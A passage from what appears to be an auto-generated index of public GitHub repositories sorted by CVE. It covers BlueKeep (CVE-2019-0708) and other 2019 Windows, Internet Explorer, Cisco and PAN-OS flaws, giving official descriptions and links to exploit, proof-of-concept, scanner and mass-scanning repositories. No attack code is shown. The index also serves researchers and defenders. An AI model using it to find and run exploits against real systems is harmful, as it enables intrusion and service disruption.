- [p0p0p0/CVE-2019-0708-exploit](https://github.com/p0p0p0/CVE-2019-0708-exploit)
- [rockmelodies/CVE-2019-0708-Exploit](https://github.com/rockmelodies/CVE-2019-0708-Exploit)
- [anquanscan/CVE-2019-0708](https://github.com/anquanscan/CVE-2019-0708)
- [xiyangzuishuai/Dark-Network-CVE-2019-0708](https://github.com/xiyangzuishuai/Dark-Network-CVE-2019-0708)
- [temp-user-2014/CVE-2019-0708](https://github.com/temp-user-2014/CVE-2019-0708)
- [areusecure/CVE-2019-0708](https://github.com/areusecure/CVE-2019-0708)
- [pry0cc/cve-2019-0708-2](https://github.com/pry0cc/cve-2019-0708-2)
- [sbkcbig/CVE-2019-0708-EXPloit](https://github.com/sbkcbig/CVE-2019-0708-EXPloit)
- [sbkcbig/CVE-2019-0708-EXPloit-3389](https://github.com/sbkcbig/CVE-2019-0708-EXPloit-3389)
- [YSheldon/MS_T120](https://github.com/YSheldon/MS_T120)
- [k8gege/CVE-2019-0708](https://github.com/k8gege/CVE-2019-0708)
- [hotdog777714/RDS_CVE-2019-0708](https://github.com/hotdog777714/RDS_CVE-2019-0708)
- [jiansiting/CVE-2019-0708](https://github.com/jiansiting/CVE-2019-0708)
- [NullByteSuiteDevs/CVE-2019-0708](https://github.com/NullByteSuiteDevs/CVE-2019-0708)
- [thugcrowd/CVE-2019-0708](https://github.com/thugcrowd/CVE-2019-0708)
- [blacksunwen/CVE-2019-0708](https://github.com/blacksunwen/CVE-2019-0708)
- [infenet/CVE-2019-0708](https://github.com/infenet/CVE-2019-0708)
- [n0auth/CVE-2019-0708](https://github.com/n0auth/CVE-2019-0708)
- [gildaaa/CVE-2019-0708](https://github.com/gildaaa/CVE-2019-0708)
- [sbkcbig/CVE-2019-0708-Poc-exploit](https://github.com/sbkcbig/CVE-2019-0708-Poc-exploit)
- [HackerJ0e/CVE-2019-0708](https://github.com/HackerJ0e/CVE-2019-0708)
- [syriusbughunt/CVE-2019-0708](https://github.com/syriusbughunt/CVE-2019-0708)
- [Barry-McCockiner/CVE-2019-0708](https://github.com/Barry-McCockiner/CVE-2019-0708)
- [ShadowBrokers-ExploitLeak/CVE-2019-0708](https://github.com/ShadowBrokers-ExploitLeak/CVE-2019-0708)
- [safly/CVE-2019-0708](https://github.com/safly/CVE-2019-0708)
- [Jaky5155/cve-2019-0708-exp](https://github.com/Jaky5155/cve-2019-0708-exp)
- [fourtwizzy/CVE-2019-0708-Check-Device-Patch-Status](https://github.com/fourtwizzy/CVE-2019-0708-Check-Device-Patch-Status)
- [303sec/CVE-2019-0708](https://github.com/303sec/CVE-2019-0708)
- [f8al/CVE-2019-0708-POC](https://github.com/f8al/CVE-2019-0708-POC)
- [blockchainguard/CVE-2019-0708](https://github.com/blockchainguard/CVE-2019-0708)
- [yushiro/CVE-2019-0708](https://github.com/yushiro/CVE-2019-0708)
- [skyshell20082008/CVE-2019-0708-PoC-Hitting-Path](https://github.com/skyshell20082008/CVE-2019-0708-PoC-Hitting-Path)
- [ttsite/CVE-2019-0708-](https://github.com/ttsite/CVE-2019-0708-)
- [ttsite/CVE-2019-0708](https://github.com/ttsite/CVE-2019-0708)
- [biggerwing/CVE-2019-0708-poc](https://github.com/biggerwing/CVE-2019-0708-poc)
- [n1xbyte/CVE-2019-0708](https://github.com/n1xbyte/CVE-2019-0708)
- [freeide/CVE-2019-0708](https://github.com/freeide/CVE-2019-0708)
- [edvacco/CVE-2019-0708-POC](https://github.com/edvacco/CVE-2019-0708-POC)
- [pry0cc/BlueKeepTracker](https://github.com/pry0cc/BlueKeepTracker)
- [zjw88282740/CVE-2019-0708-win7](https://github.com/zjw88282740/CVE-2019-0708-win7)
- [victor0013/CVE-2019-0708](https://github.com/victor0013/CVE-2019-0708)
- [herhe/CVE-2019-0708poc](https://github.com/herhe/CVE-2019-0708poc)
- [l9c/rdp0708scanner](https://github.com/l9c/rdp0708scanner)
- [major203/cve-2019-0708-scan](https://github.com/major203/cve-2019-0708-scan)
- [SugiB3o/Check-vuln-CVE-2019-0708](https://github.com/SugiB3o/Check-vuln-CVE-2019-0708)
- [gobysec/CVE-2019-0708](https://github.com/gobysec/CVE-2019-0708)
- [smallFunction/CVE-2019-0708-POC](https://github.com/smallFunction/CVE-2019-0708-POC)
- [freeide/CVE-2019-0708-PoC-Exploit](https://github.com/freeide/CVE-2019-0708-PoC-Exploit)
- [robertdavidgraham/rdpscan](https://github.com/robertdavidgraham/rdpscan)
- [closethe/CVE-2019-0708-POC](https://github.com/closethe/CVE-2019-0708-POC)
- [SQLDebugger/CVE-2019-0708-Tool](https://github.com/SQLDebugger/CVE-2019-0708-Tool)
- [Rostelecom-CERT/bluekeepscan](https://github.com/Rostelecom-CERT/bluekeepscan)
- [Leoid/CVE-2019-0708](https://github.com/Leoid/CVE-2019-0708)
- [ht0Ruial/CVE-2019-0708Poc-BatchScanning](https://github.com/ht0Ruial/CVE-2019-0708Poc-BatchScanning)
- [oneoy/BlueKeep](https://github.com/oneoy/BlueKeep)
- [infiniti-team/CVE-2019-0708](https://github.com/infiniti-team/CVE-2019-0708)
- [haishanzheng/CVE-2019-0708-generate-hosts](https://github.com/haishanzheng/CVE-2019-0708-generate-hosts)
- [Ekultek/BlueKeep](https://github.com/Ekultek/BlueKeep)
- [UraSecTeam/CVE-2019-0708](https://github.com/UraSecTeam/CVE-2019-0708)
- [Gh0st0ne/rdpscan-BlueKeep](https://github.com/Gh0st0ne/rdpscan-BlueKeep)
- [algo7/bluekeep_CVE-2019-0708_poc_to_exploit](https://github.com/algo7/bluekeep_CVE-2019-0708_poc_to_exploit)
- [JasonLOU/CVE-2019-0708](https://github.com/JasonLOU/CVE-2019-0708)
- [AdministratorGithub/CVE-2019-0708](https://github.com/AdministratorGithub/CVE-2019-0708)
- [umarfarook882/CVE-2019-0708](https://github.com/umarfarook882/CVE-2019-0708)
- [HynekPetrak/detect_bluekeep.py](https://github.com/HynekPetrak/detect_bluekeep.py)
- [Pa55w0rd/CVE-2019-0708](https://github.com/Pa55w0rd/CVE-2019-0708)
- [at0mik/CVE-2019-0708-PoC](https://github.com/at0mik/CVE-2019-0708-PoC)
- [cream-sec/CVE-2019-0708-Msf--](https://github.com/cream-sec/CVE-2019-0708-Msf--)
- [ZhaoYukai/CVE-2019-0708](https://github.com/ZhaoYukai/CVE-2019-0708)
- [ZhaoYukai/CVE-2019-0708-Batch-Blue-Screen](https://github.com/ZhaoYukai/CVE-2019-0708-Batch-Blue-Screen)
- [wdfcc/CVE-2019-0708](https://github.com/wdfcc/CVE-2019-0708)
- [cvencoder/cve-2019-0708](https://github.com/cvencoder/cve-2019-0708)
- [ze0r/CVE-2019-0708-exp](https://github.com/ze0r/CVE-2019-0708-exp)
- [mekhalleh/cve-2019-0708](https://github.com/mekhalleh/cve-2019-0708)
- [cve-2019-0708-poc/cve-2019-0708](https://github.com/cve-2019-0708-poc/cve-2019-0708)
- [andripwn/CVE-2019-0708](https://github.com/andripwn/CVE-2019-0708)
- [0xeb-bp/bluekeep](https://github.com/0xeb-bp/bluekeep)
- [ntkernel0/CVE-2019-0708](https://github.com/ntkernel0/CVE-2019-0708)
- [dorkerdevil/Remote-Desktop-Services-Remote-Code-Execution-Vulnerability-CVE-2019-0708-](https://github.com/dorkerdevil/Remote-Desktop-Services-Remote-Code-Execution-Vulnerability-CVE-2019-0708-)
- [turingcompl33t/bluekeep](https://github.com/turingcompl33t/bluekeep)
- [fade-vivida/CVE-2019-0708-test](https://github.com/fade-vivida/CVE-2019-0708-test)
- [skommando/CVE-2019-0708](https://github.com/skommando/CVE-2019-0708)
- [RickGeex/msf-module-CVE-2019-0708](https://github.com/RickGeex/msf-module-CVE-2019-0708)
- [wqsemc/CVE-2019-0708](https://github.com/wqsemc/CVE-2019-0708)
- [Micr067/CVE-2019-0708RDP-MSF](https://github.com/Micr067/CVE-2019-0708RDP-MSF)
- [FrostsaberX/CVE-2019-0708](https://github.com/FrostsaberX/CVE-2019-0708)
- [0x6b7966/CVE-2019-0708-RCE](https://github.com/0x6b7966/CVE-2019-0708-RCE)
- [qing-root/CVE-2019-0708-EXP-MSF-](https://github.com/qing-root/CVE-2019-0708-EXP-MSF-)
- [distance-vector/CVE-2019-0708](https://github.com/distance-vector/CVE-2019-0708)
- [0xFlag/CVE-2019-0708-test](https://github.com/0xFlag/CVE-2019-0708-test)
- [1aa87148377/CVE-2019-0708](https://github.com/1aa87148377/CVE-2019-0708)
- [coolboy4me/cve-2019-0708_bluekeep_rce](https://github.com/coolboy4me/cve-2019-0708_bluekeep_rce)
- [Cyb0r9/ispy](https://github.com/Cyb0r9/ispy)
- [ulisesrc/-2-CVE-2019-0708](https://github.com/ulisesrc/-2-CVE-2019-0708)
- [worawit/CVE-2019-0708](https://github.com/worawit/CVE-2019-0708)
- [Ameg-yag/Wincrash](https://github.com/Ameg-yag/Wincrash)
- [cbwang505/CVE-2019-0708-EXP-Windows](https://github.com/cbwang505/CVE-2019-0708-EXP-Windows)
- [eastmountyxz/CVE-2019-0708-Windows](https://github.com/eastmountyxz/CVE-2019-0708-Windows)
- [RICSecLab/CVE-2019-0708](https://github.com/RICSecLab/CVE-2019-0708)
- [JSec1337/Scanner-CVE-2019-0708](https://github.com/JSec1337/Scanner-CVE-2019-0708)
- [nochemax/bLuEkEeP-GUI](https://github.com/nochemax/bLuEkEeP-GUI)
- [AaronCaiii/CVE-2019-0708-POC](https://github.com/AaronCaiii/CVE-2019-0708-POC)
- [DeathStroke-source/Mass-scanner-for-CVE-2019-0708-RDP-RCE-Exploit](https://github.com/DeathStroke-source/Mass-scanner-for-CVE-2019-0708-RDP-RCE-Exploit)
- [go-bi/CVE-2019-0708-EXP-Windows](https://github.com/go-bi/CVE-2019-0708-EXP-Windows)
- [CircuitSoul/CVE-2019-0708](https://github.com/CircuitSoul/CVE-2019-0708)
- [pywc/CVE-2019-0708](https://github.com/pywc/CVE-2019-0708)
- [bibo318/kali-CVE-2019-0708-lab](https://github.com/bibo318/kali-CVE-2019-0708-lab)
- [lisinan988/CVE-2019-0708-scan](https://github.com/lisinan988/CVE-2019-0708-scan)
- [offensity/CVE-2019-0708](https://github.com/offensity/CVE-2019-0708)
- [CPT-Jack-A-Castle/Haruster-CVE-2019-0708-Exploit](https://github.com/CPT-Jack-A-Castle/Haruster-CVE-2019-0708-Exploit)
- [Ravaan21/Bluekeep-Hunter](https://github.com/Ravaan21/Bluekeep-Hunter)
- [davidfortytwo/bluekeep](https://github.com/davidfortytwo/bluekeep)
- [tranqtruong/Detect-BlueKeep](https://github.com/tranqtruong/Detect-BlueKeep)
- [rasan2001/Microsoft-Remote-Desktop-Services-Remote-Code-Execution-Vulnerability-CVE-2019-0708](https://github.com/rasan2001/Microsoft-Remote-Desktop-Services-Remote-Code-Execution-Vulnerability-CVE-2019-0708)
- [adyanamul/Remote-Code-Execution-RCE-Exploit-BlueKeep-CVE-2019-0708-PoC](https://github.com/adyanamul/Remote-Code-Execution-RCE-Exploit-BlueKeep-CVE-2019-0708-PoC)
- [DenuwanJayasekara/CVE-Exploitation-Reports](https://github.com/DenuwanJayasekara/CVE-Exploitation-Reports)
- [hualy13/CVE-2019-0708-Check](https://github.com/hualy13/CVE-2019-0708-Check)
### CVE-2019-0709 (2019-06-12)
A remote code execution vulnerability exists when Windows Hyper-V on a host server fails to properly validate input from an authenticated user on a guest operating system, aka 'Windows Hyper-V Remote Code Execution Vulnerability'. This CVE ID is unique from CVE-2019-0620, CVE-2019-0722.
- [YHZX2013/CVE-2019-0709](https://github.com/YHZX2013/CVE-2019-0709)
- [qq431169079/CVE-2019-0709](https://github.com/qq431169079/CVE-2019-0709)
- [ciakim/CVE-2019-0709](https://github.com/ciakim/CVE-2019-0709)
### CVE-2019-0752 (2019-04-09)
A remote code execution vulnerability exists in the way that the scripting engine handles objects in memory in Internet Explorer, aka 'Scripting Engine Memory Corruption Vulnerability'. This CVE ID is unique from CVE-2019-0739, CVE-2019-0753, CVE-2019-0862.
- [ZwCreatePhoton/CVE-2019-0752](https://github.com/ZwCreatePhoton/CVE-2019-0752)
### CVE-2019-0768 (2019-04-09)
A security feature bypass vulnerability exists when Internet Explorer VBScript execution policy does not properly restrict VBScript under specific conditions, and to allow requests that should otherwise be ignored, aka 'Internet Explorer Security Feature Bypass Vulnerability'. This CVE ID is unique from CVE-2019-0761.
- [ruthlezs/ie11_vbscript_exploit](https://github.com/ruthlezs/ie11_vbscript_exploit)
### CVE-2019-0785 (2019-07-15)
A memory corruption vulnerability exists in the Windows Server DHCP service when an attacker sends specially crafted packets to a DHCP failover server, aka 'Windows DHCP Server Remote Code Execution Vulnerability'.
- [Jaky5155/CVE-2019-0785](https://github.com/Jaky5155/CVE-2019-0785)
### CVE-2019-0803 (2019-04-09)
An elevation of privilege vulnerability exists in Windows when the Win32k component fails to properly handle objects in memory, aka 'Win32k Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2019-0685, CVE-2019-0859.
- [Iamgublin/CVE-2019-0803](https://github.com/Iamgublin/CVE-2019-0803)
- [ExpLife0011/CVE-2019-0803](https://github.com/ExpLife0011/CVE-2019-0803)
### CVE-2019-0808 (2019-04-09)
An elevation of privilege vulnerability exists in Windows when the Win32k component fails to properly handle objects in memory, aka 'Win32k Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2019-0797.
- [ze0r/cve-2019-0808-poc](https://github.com/ze0r/cve-2019-0808-poc)
- [rakesh143/CVE-2019-0808](https://github.com/rakesh143/CVE-2019-0808)
- [exodusintel/CVE-2019-0808](https://github.com/exodusintel/CVE-2019-0808)
- [bb33bb/CVE-2019-0808-32-64-exp](https://github.com/bb33bb/CVE-2019-0808-32-64-exp)
### CVE-2019-0841 (2019-04-09)
An elevation of privilege vulnerability exists when Windows AppX Deployment Service (AppXSVC) improperly handles hard links, aka 'Windows Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2019-0730, CVE-2019-0731, CVE-2019-0796, CVE-2019-0805, CVE-2019-0836.
- [rogue-kdc/CVE-2019-0841](https://github.com/rogue-kdc/CVE-2019-0841)
- [likekabin/CVE-2019-0841](https://github.com/likekabin/CVE-2019-0841)
- [0x00-0x00/CVE-2019-0841-BYPASS](https://github.com/0x00-0x00/CVE-2019-0841-BYPASS)
- [mappl3/CVE-2019-0841](https://github.com/mappl3/CVE-2019-0841)
### CVE-2019-0859 (2019-04-09)
An elevation of privilege vulnerability exists in Windows when the Win32k component fails to properly handle objects in memory, aka 'Win32k Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2019-0685, CVE-2019-0803.
- [Sheisback/CVE-2019-0859-1day-Exploit](https://github.com/Sheisback/CVE-2019-0859-1day-Exploit)
### CVE-2019-0887 (2019-07-15)
A remote code execution vulnerability exists in Remote Desktop Services - formerly known as Terminal Services - when an authenticated attacker abuses clipboard redirection, aka 'Remote Desktop Services Remote Code Execution Vulnerability'.
- [qianshuidewajueji/CVE-2019-0887](https://github.com/qianshuidewajueji/CVE-2019-0887)
- [t43Wiu6/CVE-2019-0887](https://github.com/t43Wiu6/CVE-2019-0887)
### CVE-2019-0888 (2019-06-12)
A remote code execution vulnerability exists in the way that ActiveX Data Objects (ADO) handle objects in memory, aka 'ActiveX Data Objects (ADO) Remote Code Execution Vulnerability'.
- [sophoslabs/CVE-2019-0888](https://github.com/sophoslabs/CVE-2019-0888)
### CVE-2019-0986 (2019-06-12)
An elevation of privilege vulnerability exists when the Windows User Profile Service (ProfSvc) improperly handles symlinks, aka 'Windows User Profile Service Elevation of Privilege Vulnerability'.
- [padovah4ck/CVE-2019-0986](https://github.com/padovah4ck/CVE-2019-0986)
### CVE-2019-905
- [xtafnull/CMS-made-simple-sqli-python3](https://github.com/xtafnull/CMS-made-simple-sqli-python3)
### CVE-2019-1006 (2019-07-15)
An authentication bypass vulnerability exists in Windows Communication Foundation (WCF) and Windows Identity Foundation (WIF), allowing signing of SAML tokens with arbitrary symmetric keys, aka 'WCF/WIF SAML Token Authentication Bypass Vulnerability'.
- [521526/CVE-2019-1006](https://github.com/521526/CVE-2019-1006)
### CVE-2019-1040 (2019-06-12)
A tampering vulnerability exists in Microsoft Windows when a man-in-the-middle attacker is able to successfully bypass the NTLM MIC (Message Integrity Check) protection, aka 'Windows NTLM Tampering Vulnerability'.
- [Ridter/CVE-2019-1040](https://github.com/Ridter/CVE-2019-1040)
- [Ridter/CVE-2019-1040-dcpwn](https://github.com/Ridter/CVE-2019-1040-dcpwn)
- [lazaars/UltraRealy_with_CVE-2019-1040](https://github.com/lazaars/UltraRealy_with_CVE-2019-1040)
- [fox-it/cve-2019-1040-scanner](https://github.com/fox-it/cve-2019-1040-scanner)
- [QAX-A-Team/dcpwn](https://github.com/QAX-A-Team/dcpwn)
### CVE-2019-1064 (2019-06-12)
An elevation of privilege vulnerability exists when Windows AppX Deployment Service (AppXSVC) improperly handles hard links, aka 'Windows Elevation of Privilege Vulnerability'.
- [RythmStick/CVE-2019-1064](https://github.com/RythmStick/CVE-2019-1064)
- [0x00-0x00/CVE-2019-1064](https://github.com/0x00-0x00/CVE-2019-1064)
- [attackgithub/CVE-2019-1064](https://github.com/attackgithub/CVE-2019-1064)
### CVE-2019-1068 (2019-07-15)
A remote code execution vulnerability exists in Microsoft SQL Server when it incorrectly handles processing of internal functions, aka 'Microsoft SQL Server Remote Code Execution Vulnerability'.
- [Vulnerability-Playground/CVE-2019-1068](https://github.com/Vulnerability-Playground/CVE-2019-1068)
### CVE-2019-1069 (2019-06-12)
An elevation of privilege vulnerability exists in the way the Task Scheduler Service validates certain file operations, aka 'Task Scheduler Elevation of Privilege Vulnerability'.
- [S3cur3Th1sSh1t/SharpPolarBear](https://github.com/S3cur3Th1sSh1t/SharpPolarBear)
### CVE-2019-1083 (2019-07-15)
A denial of service vulnerability exists when Microsoft Common Object Runtime Library improperly handles web requests, aka '.NET Denial of Service Vulnerability'.
- [stevenseeley/HowCVE-2019-1083Works](https://github.com/stevenseeley/HowCVE-2019-1083Works)
### CVE-2019-1096 (2019-07-15)
An information disclosure vulnerability exists when the win32k component improperly provides kernel information, aka 'Win32k Information Disclosure Vulnerability'.
- [CrackerCat/cve-2019-1096-poc](https://github.com/CrackerCat/cve-2019-1096-poc)
### CVE-2019-1108 (2019-07-29)
An information disclosure vulnerability exists when the Windows RDP client improperly discloses the contents of its memory, aka 'Remote Desktop Protocol Client Information Disclosure Vulnerability'.
- [Lanph3re/cve-2019-1108](https://github.com/Lanph3re/cve-2019-1108)
### CVE-2019-1125 (2019-09-03)
An information disclosure vulnerability exists when certain central processing units (CPU) speculatively access memory. An attacker who successfully exploited the vulnerability could read privileged data across trust boundaries.\nTo exploit this vulnerability, an attacker would have to log on to an affected system and run a specially crafted application. The vulnerability would not allow an attacker to elevate user rights directly, but it could be used to obtain information that could be used to try to compromise the affected system further.\nOn January 3, 2018, Microsoft released an advisory and security updates related to a newly-discovered class of hardware vulnerabilities (known as Spectre) involving speculative execution side channels that affect AMD, ARM, and Intel CPUs to varying degrees. This vulnerability, released on August 6, 2019, is a variant of the Spectre Variant 1 speculative execution side channel vulnerability and has been assigned CVE-2019-1125.\nMicrosoft released a security update on July 9, 2019 that addresses the vulnerability through a software change that mitigates how the CPU speculatively accesses memory. Note that this vulnerability does not require a microcode update from your device OEM.\n
- [bitdefender/swapgs-attack-poc](https://github.com/bitdefender/swapgs-attack-poc)
### CVE-2019-1132 (2019-07-29)
An elevation of privilege vulnerability exists in Windows when the Win32k component fails to properly handle objects in memory, aka 'Win32k Elevation of Privilege Vulnerability'.
- [Vlad-tri/CVE-2019-1132](https://github.com/Vlad-tri/CVE-2019-1132)
- [petercc/CVE-2019-1132](https://github.com/petercc/CVE-2019-1132)
### CVE-2019-1181 (2019-08-14)
A remote code execution vulnerability exists in Remote Desktop Services – formerly known as Terminal Services – when an unauthenticated attacker connects to the target system using RDP and sends specially crafted requests. This vulnerability is pre-authentication and requires no user interaction. An attacker who successfully exploited this vulnerability could execute arbitrary code on the target system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\nTo exploit this vulnerability, an attacker would need to send a specially crafted request to the target systems Remote Desktop Service via RDP.\nThe update addresses the vulnerability by correcting how Remote Desktop Services handles connection requests.\n
- [major203/cve-2019-1181](https://github.com/major203/cve-2019-1181)
### CVE-2019-1215 (2019-09-11)
An elevation of privilege vulnerability exists in the way that ws2ifsl.sys (Winsock) handles objects in memory, aka 'Windows Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2019-1253, CVE-2019-1278, CVE-2019-1303.
- [bluefrostsecurity/CVE-2019-1215](https://github.com/bluefrostsecurity/CVE-2019-1215)
### CVE-2019-1218 (2019-08-14)
A spoofing vulnerability exists in the way Microsoft Outlook iOS software parses specifically crafted email messages. An authenticated attacker could exploit the vulnerability by sending a specially crafted email message to a victim.\nThe attacker who successfully exploited this vulnerability could then perform cross-site scripting attacks on the affected systems and run scripts in the security context of the current user.\nThe security update addresses the vulnerability by correcting how Outlook iOS parses specially crafted email messages.\n
- [d0gukank/CVE-2019-1218](https://github.com/d0gukank/CVE-2019-1218)
### CVE-2019-1221 (2019-09-11)
A remote code execution vulnerability exists in the way that the scripting engine handles objects in memory in Internet Explorer, aka 'Scripting Engine Memory Corruption Vulnerability'.
- [ZwCreatePhoton/CVE-2019-1221](https://github.com/ZwCreatePhoton/CVE-2019-1221)
### CVE-2019-1253 (2019-09-11)
An elevation of privilege vulnerability exists when the Windows AppX Deployment Server improperly handles junctions.To exploit this vulnerability, an attacker would first have to gain execution on the victim system, aka 'Windows Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2019-1215, CVE-2019-1278, CVE-2019-1303.
- [rogue-kdc/CVE-2019-1253](https://github.com/rogue-kdc/CVE-2019-1253)
- [likekabin/CVE-2019-1253](https://github.com/likekabin/CVE-2019-1253)
- [padovah4ck/CVE-2019-1253](https://github.com/padovah4ck/CVE-2019-1253)
- [sgabe/CVE-2019-1253](https://github.com/sgabe/CVE-2019-1253)
### CVE-2019-1315 (2019-10-10)
An elevation of privilege vulnerability exists when Windows Error Reporting manager improperly handles hard links, aka 'Windows Error Reporting Manager Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2019-1339, CVE-2019-1342.
- [Mayter/CVE-2019-1315](https://github.com/Mayter/CVE-2019-1315)
### CVE-2019-1332 (2019-12-10)
A cross-site scripting (XSS) vulnerability exists when Microsoft SQL Server Reporting Services (SSRS) does not properly sanitize a specially-crafted web request to an affected SSRS server, aka 'Microsoft SQL Server Reporting Services XSS Vulnerability'.
- [mbadanoiu/CVE-2019-1332](https://github.com/mbadanoiu/CVE-2019-1332)
### CVE-2019-1351 (2020-01-24)
A tampering vulnerability exists when Git for Visual Studio improperly handles virtual drive paths, aka 'Git for Visual Studio Tampering Vulnerability'.
- [JonasDL/PruebaCVE20191351](https://github.com/JonasDL/PruebaCVE20191351)
### CVE-2019-1367 (2019-09-23)
A remote code execution vulnerability exists in the way that the scripting engine handles objects in memory in Internet Explorer, aka 'Scripting Engine Memory Corruption Vulnerability'. This CVE ID is unique from CVE-2019-1221.
- [mandarenmanman/CVE-2019-1367](https://github.com/mandarenmanman/CVE-2019-1367)
### CVE-2019-1385 (2019-11-12)
An elevation of privilege vulnerability exists when the Windows AppX Deployment Extensions improperly performs privilege management, resulting in access to system files.To exploit this vulnerability, an authenticated attacker would need to run a specially crafted application to elevate privileges.The security update addresses the vulnerability by correcting how AppX Deployment Extensions manages privileges., aka 'Windows AppX Deployment Extensions Elevation of Privilege Vulnerability'.
- [0x413x4/CVE-2019-1385](https://github.com/0x413x4/CVE-2019-1385)
### CVE-2019-1388 (2019-11-12)
An elevation of privilege vulnerability exists in the Windows Certificate Dialog when it does not properly enforce user privileges, aka 'Windows Certificate Dialog Elevation of Privilege Vulnerability'.
- [jas502n/CVE-2019-1388](https://github.com/jas502n/CVE-2019-1388)
- [jaychouzzk/CVE-2019-1388](https://github.com/jaychouzzk/CVE-2019-1388)
- [sv3nbeast/CVE-2019-1388](https://github.com/sv3nbeast/CVE-2019-1388)
- [nobodyatall648/CVE-2019-1388](https://github.com/nobodyatall648/CVE-2019-1388)
- [suprise4u/CVE-2019-1388](https://github.com/suprise4u/CVE-2019-1388)
### CVE-2019-1402 (2019-11-12)
An information disclosure vulnerability exists in Microsoft Office software when the software fails to properly handle objects in memory, aka 'Microsoft Office Information Disclosure Vulnerability'.
- [lauxjpn/CorruptQueryAccessWorkaround](https://github.com/lauxjpn/CorruptQueryAccessWorkaround)
### CVE-2019-1405 (2019-11-12)
An elevation of privilege vulnerability exists when the Windows Universal Plug and Play (UPnP) service improperly allows COM object creation, aka 'Windows UPnP Service Elevation of Privilege Vulnerability'.
- [apt69/COMahawk](https://github.com/apt69/COMahawk)
### CVE-2019-1422 (2019-11-12)
An elevation of privilege vulnerability exists in the way that the iphlpsvc.dll handles file creation allowing for a file overwrite, aka 'Windows Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2019-1420, CVE-2019-1423.
- [ze0r/cve-2019-1422](https://github.com/ze0r/cve-2019-1422)
### CVE-2019-1458 (2019-12-10)
An elevation of privilege vulnerability exists in Windows when the Win32k component fails to properly handle objects in memory, aka 'Win32k Elevation of Privilege Vulnerability'.
- [piotrflorczyk/cve-2019-1458_POC](https://github.com/piotrflorczyk/cve-2019-1458_POC)
- [rip1s/CVE-2019-1458](https://github.com/rip1s/CVE-2019-1458)
- [Eternit7/CVE-2019-1458](https://github.com/Eternit7/CVE-2019-1458)
### CVE-2019-1476 (2019-12-10)
An elevation of privilege vulnerability exists when Windows AppX Deployment Service (AppXSVC) improperly handles hard links, aka 'Windows Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2019-1483.
- [sgabe/CVE-2019-1476](https://github.com/sgabe/CVE-2019-1476)
### CVE-2019-1579 (2019-07-19)
Remote Code Execution in PAN-OS 7.1.18 and earlier, PAN-OS 8.0.11-h1 and earlier, and PAN-OS 8.1.2 and earlier with GlobalProtect Portal or GlobalProtect Gateway Interface enabled may allow an unauthenticated remote attacker to execute arbitrary code.
- [securifera/CVE-2019-1579](https://github.com/securifera/CVE-2019-1579)
- [Elsfa7-110/CVE-2019-1579](https://github.com/Elsfa7-110/CVE-2019-1579)
### CVE-2019-1652 (2019-01-24)
A vulnerability in the web-based management interface of Cisco Small Business RV320 and RV325 Dual Gigabit WAN VPN Routers could allow an authenticated, remote attacker with administrative privileges on an affected device to execute arbitrary commands. The vulnerability is due to improper validation of user-supplied input. An attacker could exploit this vulnerability by sending malicious HTTP POST requests to the web-based management interface of an affected device. A successful exploit could allow the attacker to execute arbitrary commands on the underlying Linux shell as root. Cisco has released firmware updates that address this vulnerability.
- [0x27/CiscoRV320Dump](https://github.com/0x27/CiscoRV320Dump)
### CVE-2019-1653 (2019-01-24)
A vulnerability in the web-based management interface of Cisco Small Business RV320 and RV325 Dual Gigabit WAN VPN Routers could allow an unauthenticated, remote attacker to retrieve sensitive information. The vulnerability is due to improper access controls for URLs. An attacker could exploit this vulnerability by connecting to an affected device via HTTP or HTTPS and requesting specific URLs. A successful exploit could allow the attacker to download the router configuration or detailed diagnostic information. Cisco has released firmware updates that address this vulnerability.
- [dubfr33/CVE-2019-1653](https://github.com/dubfr33/CVE-2019-1653)
- [shaheemirza/CiscoSpill](https://github.com/shaheemirza/CiscoSpill)
- [ibrahimzx/CVE-2019-1653](https://github.com/ibrahimzx/CVE-2019-1653)
### CVE-2019-1663 (2019-02-28)
A vulnerability in the web-based management interface of the Cisco RV110W Wireless-N VPN Firewall, Cisco RV130W Wireless-N Multifunction VPN Router, and Cisco RV215W Wireless-N VPN Router could allow an unauthenticated, remote attacker to execute arbitrary code on an affected device. The vulnerability is due to improper validation of user-supplied data in the web-based management interface. An attacker could exploit this vulnerability by sending malicious HTTP requests to a targeted device. A successful exploit could allow the attacker to execute arbitrary code on the underlying operating system of the affected device as a high-privilege user. RV110W Wireless-N VPN Firewall versions prior to 1.2.2.1 are affected. RV130W Wireless-N Multifunction VPN Router versions prior to 1.0.3.45 are affected. RV215W Wireless-N VPN Router versions prior to 1.3.1.1 are affected.
- [StealYourCode/CVE-2019-1663](https://github.com/StealYourCode/CVE-2019-1663)
- [abrumsen/CVE-2019-1663](https://github.com/abrumsen/CVE-2019-1663)
### CVE-2019-1698 (2019-02-21)
A vulnerability in the web-based user interface of Cisco Internet of Things Field Network Director (IoT-FND) Software could allow an authenticated, remote attacker to gain read access to information that is stored on an affected system. The vulnerability is due to improper handling of XML External Entity (XXE) entries when parsing certain XML files. An attacker could exploit this vulnerability by importing a crafted XML file with malicious entries, which could allow the attacker to read files within the affected application. Versions prior to 4.4(0.26) are affected.
- [raytran54/CVE-2019-1698](https://github.com/raytran54/CVE-2019-1698)
### CVE-2019-1759 (2019-03-28)
A vulnerability in access control list (ACL) functionality of the Gigabit Ethernet Management interface of Cisco IOS XE Software could allow an unauthenticated, remote attacker to reach the configured IP addresses on the Gigabit Ethernet Management interface. The vulnerability is due to a logic error that was introduced in the Cisco IOS XE Software 16.1.1 Release, which prevents the ACL from working when applied against the management interface. An attacker could exploit this issue by attempting to access the device via the management interface.
- [r3m0t3nu11/CVE-2019-1759-csrf-js-rce](https://github.com/r3m0t3nu11/CVE-2019-1759-csrf-js-rce)
### CVE-2019-1821 (2019-05-16)
A vulnerability in the web-based management interface of Cisco Prime Infrastructure (PI) and Cisco Evolved Programmable Network (EPN) Manager could allow an authenticated, remote attacker to execute code with root-level privileges on the underlying operating system. This vulnerability exist because the software improperly validates user-supplied input. An attacker could exploit this vulnerability by uploading a malicious file to the administrative web interface. A successful exploit could allow the attacker to execute code with root-level privileges on the underlying operating system.
